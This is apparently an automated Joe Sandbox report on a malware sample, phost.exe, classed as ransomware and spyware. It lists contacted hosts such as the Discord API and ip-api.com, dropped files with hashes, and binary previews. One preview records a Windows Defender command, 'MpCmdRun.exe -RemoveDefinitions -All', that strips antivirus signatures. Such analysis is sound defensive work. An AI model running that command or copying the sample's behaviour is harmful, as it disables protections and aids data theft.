                                                                                                                                                                                          https://www.python.org/download/releases/2.3/mro/.phost.exe, 00000001.00000003.1687852160.000001AE1CFFE000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176648071.000001AE1CC60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://contoso.com/Licensepowershell.exe, 0000004A.00000002.2029247692.000001C725AF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://discordapp.com/api/v9/users/phost.exe, 00000001.00000002.2177140880.000001AE1D0A0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourcephost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176648071.000001AE1CCDC000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  http://ip-api.com/json/?fields=225545rphost.exe, 00000001.00000003.1816470539.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1702313330.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864030272.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1704441144.000001AE1D329000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1885946451.000001AE1D336000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1848757509.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=phost.exe, 00000001.00000003.2169554554.000001AE1E117000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specphost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176648071.000001AE1CCDC000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://github.com/urlliphost.exe, 00000001.00000003.1704441144.000001AE1D329000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1704494690.000001AE1D381000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://github.com/urllib3/urllib3/issues/2920phost.exe, 00000001.00000003.1842261128.000001AE1D6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1830725428.000001AE1D6F0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1856459466.000001AE1D6F0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179183258.000001AE1DBB8000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1851038862.000001AE1D6F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17phost.exe, 00000001.00000003.2171558185.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2167660271.000001AE1E6C3000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2166653178.000001AE1D872000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              http://www.microsoftMESSAG~1.JSOy./phost.exe, 00000001.00000003.1849010645.000001AE1D730000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_dataphost.exe, 00000001.00000002.2176893974.000001AE1CFA0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684912540.000001AE1CFA2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://yahoo.com/phost.exe, 00000001.00000003.1837339893.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1853895159.000001AE1D368000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1815420180.000001AE1D359000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864387686.000001AE1D361000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1848923148.000001AE1D368000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2175758589.000001AE1D383000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D600000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864030272.000001AE1D35D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177552719.000001AE1D385000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1871682113.000001AE1D361000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857854012.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D604000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1830725428.000001AE1D600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      https://account.bellmedia.cphost.exe, 00000001.00000003.1866119745.000001AE1E6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179807278.000001AE1E6EA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E964000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6phost.exe, 00000001.00000002.2177248707.000001AE1D1A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://g.live.com/odclientsettings/ProdV2svchost.exe, 00000014.00000003.1751303220.000001E22D972000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                            208.95.112.1
                                                                                                                                                                                                                            ip-api.comUnited States
                                                                                                                                                                                                                            53334TUT-ASUStrue
                                                                                                                                                                                                                            162.159.137.232
                                                                                                                                                                                                                            discord.comUnited States
                                                                                                                                                                                                                            13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                            IP
                                                                                                                                                                                                                            127.0.0.1
                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                            Analysis ID:1574326
                                                                                                                                                                                                                            Start date and time:2024-12-13 08:40:50 +01:00
                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                            Overall analysis duration:0h 13m 10s
                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                            Number of analysed new started processes analysed:125
                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                            Sample name:phost.exe
                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                            Classification:mal100.rans.troj.adwa.spyw.expl.evad.winEXE@199/60@4/3
                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                            • Successful, ratio: 50%
                                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                                            • Successful, ratio: 86%
                                                                                                                                                                                                                            • Number of executed functions: 120
                                                                                                                                                                                                                            • Number of non-executed functions: 181
                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 172.217.19.227, 23.218.208.109, 20.12.23.50, 13.107.246.63, 52.149.20.212
                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, gstatic.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                            • Execution Graph export aborted for target mshta.exe, PID 3848 because there are no executed function
                                                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 2912 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7400 because it is empty
                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                            • VT rate limit hit for: phost.exe
                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                            02:41:45API Interceptor8x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                            02:41:46API Interceptor127x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                            02:41:48API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                                                                            Entropy (8bit):1.3073759923211927
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrH:KooCEYhgYEL0In
                                                                                                                                                                                                                            MD5:61D71392A301B081EFE4418B4E340E39
                                                                                                                                                                                                                            SHA1:376F1AF4DD3AE97A94EEA6E41E5CA4270643D9EC
                                                                                                                                                                                                                            SHA-256:744B8870071E506EDEE7AD52F48B47A4BC7A0A8EC426F190C651FDDB00D41CD0
                                                                                                                                                                                                                            SHA-512:0D15622BE7D8DCB736BA0D182277E47C7AE9F0E5F294C05B313B80232C23613C02471A3E45895480DE008482A0E6E46F2F92FD9BE9F181932C5F48BEF8BB4058
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xa482f3c7, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                                                                            Entropy (8bit):0.4221475214700262
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:BSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Baza/vMUM2Uvz7DO
                                                                                                                                                                                                                            MD5:C413DFE1813856686583B3554ED45E76
                                                                                                                                                                                                                            SHA1:49ABE0C3E213C0B91634E0D24B09DEEC26EC01C8
                                                                                                                                                                                                                            SHA-256:589E331447AE1B032C955FC5700A7FADE56EABE4CFBBD220D567F20FE90F05AD
                                                                                                                                                                                                                            SHA-512:BB9A7D14FF659A0F7A89C5C7D2802FF9498E3BB5E769A4F883AB175EDAEB0822E57BC8CE1F653E2D41C1DFE76500EC97C679E34F912580E2C2B2E2BC691B383B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:....... .......A.......X\...;...{......................0.!..........{A.1)...|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................3U.)1)...|...................8G.1)...|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                                                                            Entropy (8bit):0.07706861796382056
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:JZS6Yejwuauajn13a/w4VY//AllcVO/lnlZMxZNQl:Xdzjfa53qwV/AOewk
                                                                                                                                                                                                                            MD5:C4C7AFF2D6AAD5478F260F8E0B4F955F
                                                                                                                                                                                                                            SHA1:D2AA7BFA0791B36ECE4FEBDF2F9A2C77012C3073
                                                                                                                                                                                                                            SHA-256:F12358942163F352E0C07F22ADB868FB2FF1121AC06DB6F3D97896834343A410
                                                                                                                                                                                                                            SHA-512:6372CF06EB66ECB1E4E439373B2904D63211F5D302D60474E7CFDE1D444A61F28F6F471EA78ADD4568771F1DEBA0DD2EC2A9E1EC5A62B3467617F51366777750
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.{.......................................;...{..1)...|.......{A..............{A......{A..........{A].................8G.1)...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:@...e...........................................................
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):706250
                                                                                                                                                                                                                            Entropy (8bit):7.928179193196619
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:9CJt7G19YHjWTnRyMqTVGInIQghHK5gYrNvOLOkT+TvDhdkBeKc89B:9C49RTnMlR/IQqYgYrNvO6eq9daeKc8/
                                                                                                                                                                                                                            MD5:EADFB28E5835FF3D32EB5824EC32A474
                                                                                                                                                                                                                            SHA1:1FF3F10F785B72AFA1993BD24338DD81CB79D83B
                                                                                                                                                                                                                            SHA-256:D0E034501D05159C8B53F22FCBB21DA6947A0B75153C8197840389DEE3163355
                                                                                                                                                                                                                            SHA-512:D9A777B1E6A55FA7323E9B655AB4501EB59BC38D0BEA5EB4D508FAA58578CA09F5D068C34FBC29BC102F9D33FA12AF24072B1D938D0D99592E656A53DC853109
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...^.v..{NW...)..3.].=..9m.v.m.EH..lc...x7.}........`..$.b....-..I...........R.89.w"./..|.......Z.7BoY..M.s3c+......m..?2...0....9.s....~....#}..x_.d$....5@....v...}.z......v.k..T..)...'..N..X..}'.e-....mA..C.~....WP?vI..^S;fqG..=t.G-...&.#_..}?[8...rO..........aS.....?~1...A....%}?.q}........{......g.D...%.......<.....<U..>......7...|........x_.....-...O.W.H..T..... 6.O&......P?.....~C......T....A.yK}..v.Ca....c.?2....N.}....}..(.L..'..G}..C.....q\?..c\k..|.~.c...../.J.k...<..o.yUl.......{.{.....}1.......)6n....}b..1..{...y..v_..17.v........-.4....{^..s..v,..G;....zo.c.....6;.6...G.C...>7..#.[...8...D}.{.....{.}c....=..-....=...%...$.v.;.w...1..#^+....Lycw....[.n..%.......?..].I....9.c.s.......v....|D....H..pg....lB..w'.<b}..}...O.3.mwG..!.o.X}......c....>h/...>........x.v1o..C..x..'.<A.y`n...3.1.O......m)....).\].k1..i..q,..kN.
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe
                                                                                                                                                                                                                            File Type:RAR archive data, v5
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):757646
                                                                                                                                                                                                                            Entropy (8bit):7.999736789323823
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:12288:uElNmrIp2smq2mOd7ys9D2qUDqlU54hFjCDuksUTVv+MjNkMdO/rcmBiH0OFS:uw0Y2sv2my7ygD2qUDr5SFjChddYjcJ0
                                                                                                                                                                                                                            MD5:1E909F7CC298F3086E9AA5BE0D09768F
                                                                                                                                                                                                                            SHA1:931A5056D9D36FA581F04EC5FE2FD654D7BEAD44
                                                                                                                                                                                                                            SHA-256:042655B7F2743818ADFAC34EFD97D5E6045FB218BAED192F587B3A449D315223
                                                                                                                                                                                                                            SHA-512:834272434703C41924747341D1DE5EEEA6EE9B23438F34C0EB3E9F43E55FE63D8B1308DE83B197E49969AB7A41A35D08B57C6152B2717A6BC95AA1FAFFA66657
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:Rar!......g!.....gw..V.Q&.y!ux.6.....h0...n.V`......U.JrE....D$.<Km.\jn..6y.K.....r"k.K.....y@....D..e..DPz._.....W.}z...fy.i.g.I3...C.v.h.^..!..x..Qrg...d..."..}./.v....^..h(.&.......w..R..nu{.^...U!..NA.....T6.PN.3/mE..+.C....h...S8..'..E..B..^mx.Ci!............41...3h..%PN...o.N.i...];....nu..~S..ZHl.0.Ov.T\..........r..l....._.2.DMG}...2.o]....J`$....P.-~..o..=8.4.v..P....I....s...TC=7...M....P#N^.....\D*Pj._..[.y..<..._Cx.W.....=6.n.,.[..q........-...G...,.........B....m.D.mC...T.5.r.......)..-.SI.F.e..{.u=.MsJ...fZ.=...k...g.L&.!..<..wl..=fR9.....DG........j.v..?.p........"......h...'.z.f2..X..^l.....`~......x,...%7......uM..|.{:.....a{..>..X.#^245Q4z.SJ....w...X....IV.X#..0..h.B.y.[.d...<.Wlu.....y4..e8.R]..zX.C.j.v......:.....O..\I...:6).....^E.."R..d.@.\....A#.,.....=.:.@.............upVX.xX...[..K..t.5?.R......w.ah|....{..C/.1.C..U:...E.L.{.|/#O!..."fd...A..9W9s..z.....m@Q..*?..RF+H.Kd.o}.M.H.d..c]/~...~Qb......7.,.xG.....].P.....!....T
                                                                                                                                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):894
                                                                                                                                                                                                                            Entropy (8bit):3.1142270972323556
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:Q58KRBubdpkoPAGdjrN78sk9+MlWlLehW51IC0781:QOaqdmOFdjrmv+kWResLIe1
                                                                                                                                                                                                                            MD5:4EF56D046A1B4B24A11061DC33DACB35
                                                                                                                                                                                                                            SHA1:240AAE0289B81B02CFD1F1603DC51BB22618C087
                                                                                                                                                                                                                            SHA-256:69F26C82BFAEFDE7210F5D436C7D982C1C48B1F1A8F737A1A63477E18D56DA79
                                                                                                                                                                                                                            SHA-512:629894D9DAF141AA81C0122EEA4924B87F198565711FB4A5AF577E460959F30A84995F8BE9D9F2580C4F18A5ADB812D92C37D11F343ED1716F3AE4AACC6C9AAF
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 1.3. .. 2.0.2.4. .0.2.:.4.1.:.5.8.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 1.3. .. 2.0.2.4. .0.2.:.4.1.:.5.8.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Fri Dec 13 08:56:10 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1372
                                                                                                                                                                                                                            Entropy (8bit):4.122600787215519
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:HoFq9UZf1orDfHKwK9Gof3NWI+ycuZhNpYakSGNPNnqS+d:IvB1YBKD341ulia32qSe
                                                                                                                                                                                                                            MD5:7EC0018A1BF0364548FE7A8CA45DA3C2
                                                                                                                                                                                                                            SHA1:D11CD7EDEFC0E8B1474A68827407651AE1D738CA
                                                                                                                                                                                                                            SHA-256:F59B2ED50C0C5BA912B8A38F6D59B691261496D0F4ACA04F468CD0D9E53BDCCC
                                                                                                                                                                                                                            SHA-512:E947F826946D7A6E8D1F8AD9AC9704E6015F127CB1F34C45A17E3635905FB24E591D79F805749A0B3DD094AA85F9FC7512DF5833574C9D34B6DC5DBE64504809
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:L.....[g.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........S....c:\Users\user\AppData\Local\Temp\jnxiphgt\CSC11F91C33F0BB4EC3B771882E34D952E.TMP................9.i....'.=._[}...........4.......C:\Users\user\AppData\Local\Temp\RESBE0B.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.n.x.i.p.h.g.t...d.l.l.....(.....L.e.g.a.
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):109392
                                                                                                                                                                                                                            Entropy (8bit):6.641929675972235
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
                                                                                                                                                                                                                            MD5:4585A96CC4EEF6AAFD5E27EA09147DC6
                                                                                                                                                                                                                            SHA1:489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
                                                                                                                                                                                                                            SHA-256:A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
                                                                                                                                                                                                                            SHA-512:D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d..._#;..........." ...".....`......................................................=.....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
